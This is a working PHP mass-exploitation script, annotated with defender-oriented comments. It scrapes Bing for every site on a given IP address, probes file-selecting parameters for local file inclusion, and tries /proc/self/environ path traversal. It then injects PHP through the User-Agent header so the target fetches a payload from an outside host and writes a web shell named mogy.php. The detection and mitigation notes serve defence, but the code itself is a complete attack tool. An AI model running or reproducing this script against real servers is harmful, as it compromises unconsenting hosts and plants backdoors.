- <?php
- /*
- Author = mogyhacker
- Updated By INJ3CTOR_M4 ( Added Server Scanner , function lfi scanner )
- */
- // Command-line entry point. Analyst summary: given one IP address, the script
- // collects search-engine results for URLs on that address that carry
- // file-selecting query parameters, tests each for a local file inclusion (LFI)
- // symptom, and on a hit tries to get PHP code executed through
- // /proc/self/environ so that a file named mogy.php is written on the target.
- // The notes below describe what each stage sends, so the traffic can be
- // recognised in logs and the underlying weakness closed.
- //
- // No execution time limit, and every PHP warning/notice is suppressed, so
- // failures in the helpers below are silent.
- @set_time_limit (0);
- error_reporting (0);
- // First CLI argument; interpolated unvalidated into the search query below.
- $ip = $argv[1];
- echo"\n\t\tScanning LFI From $ip\n\n";
- // Query-parameter names the author treats as likely file selectors. On your
- // own code base these are the parameters to audit first: none of them should
- // reach include/require/fopen without being mapped through an allow-list.
- $dorks = array('.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=');
- foreach($dorks as $dork){
- // Rev() is queried with "ip:<address> <pattern>", i.e. every indexed site
- // sharing that address is in scope, not one named application.
- foreach(Rev ("ip:$ip $dork") as $url){
- // Stage 1 (probe): the literal marker __dz__ is appended to the parameter and
- // the request is sent with a Firefox 3.6.3 User-Agent.
- // Detection: parameter values ending in "__dz__" in access logs.
- $gt = lficurl ($url.'__dz__',"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- // The only vulnerability signal used is PHP's own warning text in the response
- // body (case-insensitive match). It is visible only when errors are rendered
- // to the client; display_errors=Off removes the signal but not the flaw.
- $searchme = "failed to open stream";
- if(preg_match("/$searchme/i", $gt)){
- echo "\n[+] $url >> Vulnerable !\r\n";
- // Stage 2 (path guessing): /proc/self/environ behind a growing number of "../"
- // segments, then the same list again with a trailing %00.
- // Detection: "proc/self/environ" or "%00" inside a query-string value.
- // NOTE(review): the %00 variants presumably aim at code that appends a fixed
- // suffix to the path; PHP has rejected NUL bytes in file paths since 5.3.4.
- $environs = array ('/proc/self/environ','../proc/self/environ','../../proc/self/environ','../../../proc/self/environ','../../../../proc/self/environ','../../../../../proc/self/environ','../../../../../../proc/self/environ','../../../../../../../proc/self/environ','../../../../../../../../proc/self/environ','../../../../../../../../../proc/self/environ','../../../../../../../../../../proc/self/environ','../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../../proc/self/environ','/proc/self/environ%00','../proc/self/environ%00','../../proc/self/environ%00','../../../proc/self/environ%00','../../../../proc/self/environ%00','../../../../../proc/self/environ%00','../../../../../../proc/self/environ%00','../../../../../../../proc/self/environ%00','../../../../../../../../proc/self/environ%00','../../../../../../../../../proc/self/environ%00','../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../../proc/self/environ%00');
- foreach ($environs as $environ){
- $envs = lficurl ($url.$environ,"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- // A body containing "HTTP_HOST" is taken as proof that the process environment
- // was returned. An open_basedir setting that excludes /proc denies this read.
- if (preg_match("/HTTP_HOST/",$envs)){
- echo"\t[+] Environ Found!\r\n";
- // Stage 3 (code execution attempt): the same URL is requested again with PHP
- // source as the User-Agent header value; the return value is discarded.
- // Presumably relies on request headers being present in the process
- // environment (CGI-style execution) - confirm for your stack.
- // Detection: a User-Agent containing "<?php"; outbound HTTP from the web
- // server to the host named in the literal below (treat it as an IoC; it is
- // presumably a compromised third-party site - unverified).
- // Mitigation: allow_url_fopen=Off blocks the remote fetch this snippet
- // performs, and a web root that the PHP user cannot write to blocks the drop.
- lficurl ($url.$environ, "<?php file_put_contents('mogy.php',file_get_contents('http://ifiwon50million.com/wp-admin/upload.txt')); ?>");
- // Stage 4 (verification): mogy.php is requested from the directory of the
- // probed URL and checked for the marker "By Mogy".
- // Detection: an unexpected mogy.php next to a legitimate script, and GET
- // requests for it immediately after the stage 3 request.
- $pathinfo = pathinfo($url);
- $shellpath = $pathinfo['dirname'].'/mogy.php';
- if (preg_match ("/By Mogy/",file_get_contents($shellpath))){
- echo"\tShell Uploaded: $shellpath\n\n";
- }else{
- echo"Environ Methode Don't Allowed\n\n";
- }
- }else{
- echo"\t[+] Environ Not Found!\n\n";
- }
- }
- }else{
- echo"\n[+] $url >> Not Vulnerable!\r\n";
- }
- }
- }
- // Rev($dork): collects candidate URLs from Bing result pages for the query
- // string $dork and returns them de-duplicated. Returns no value (null) when
- // nothing was collected.
- // The caller passes "ip:<address> <pattern>", so the result set is every
- // indexed URL on that address matching the pattern. On shared hosting, one
- // tenant's unsafe include therefore puts the whole address in such a list.
- function Rev ($dork)
- {
- // Result offsets 1, 11, 21, ... up to 991 via the "first" parameter.
- for($i = 1; $i <= 1000; $i += 10){
- // The User-Agent claims to be msnbot; the request is made by this script, so
- // the value is self-declared and says nothing about the real origin.
- $gt = lficurl ("http://www.bing.com/search?q=".urlencode($dork)."&first=$i","msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- // Result links are scraped from the markup of the result headings.
- $searchme = '/<h2><a href="(.*?)" h="/';
- preg_match_all($searchme, $gt, $matches);
- foreach($matches[1] as $site){
- // Each hit is reduced by _Fix() before being stored.
- $urls[] = _Fix($site);
- }
- // Stop when the page no longer contains the class="sb_pagN" pagination marker.
- if(!preg_match('#class="sb_pagN"#',$gt)) break;
- }
- if(!empty($urls) && is_array($urls)){
- return array_unique($urls);
- }
- }
- // _Fix($site): returns the second capture group of the first match with "="
- // appended. NOTE(review): with this pattern that appears to be the text before
- // the first "=" in $site, i.e. the URL cut off after its first parameter name,
- // so the caller's appended strings become that parameter's value - confirm.
- function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; }
- // lficurl($url, $useragent): performs one HTTP request to $url with the given
- // User-Agent header and returns the curl_exec() result (the response body,
- // because CURLOPT_RETURNTRANSFER is set).
- // $useragent is sent as-is, which is how the main loop places arbitrary text
- // in that header. For defenders: User-Agent is attacker-controlled input, like
- // any other request field, wherever it is logged or exposed to the
- // application.
- function lficurl ($url,$useragent)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- // Cookies are read from and written to cookie.txt in the current working
- // directory, so they persist across every request the script makes.
- curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- // Redirects are followed; no timeout option is set in this function.
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $result = curl_exec ($ch);
- curl_close ($ch);
- return $result;
- }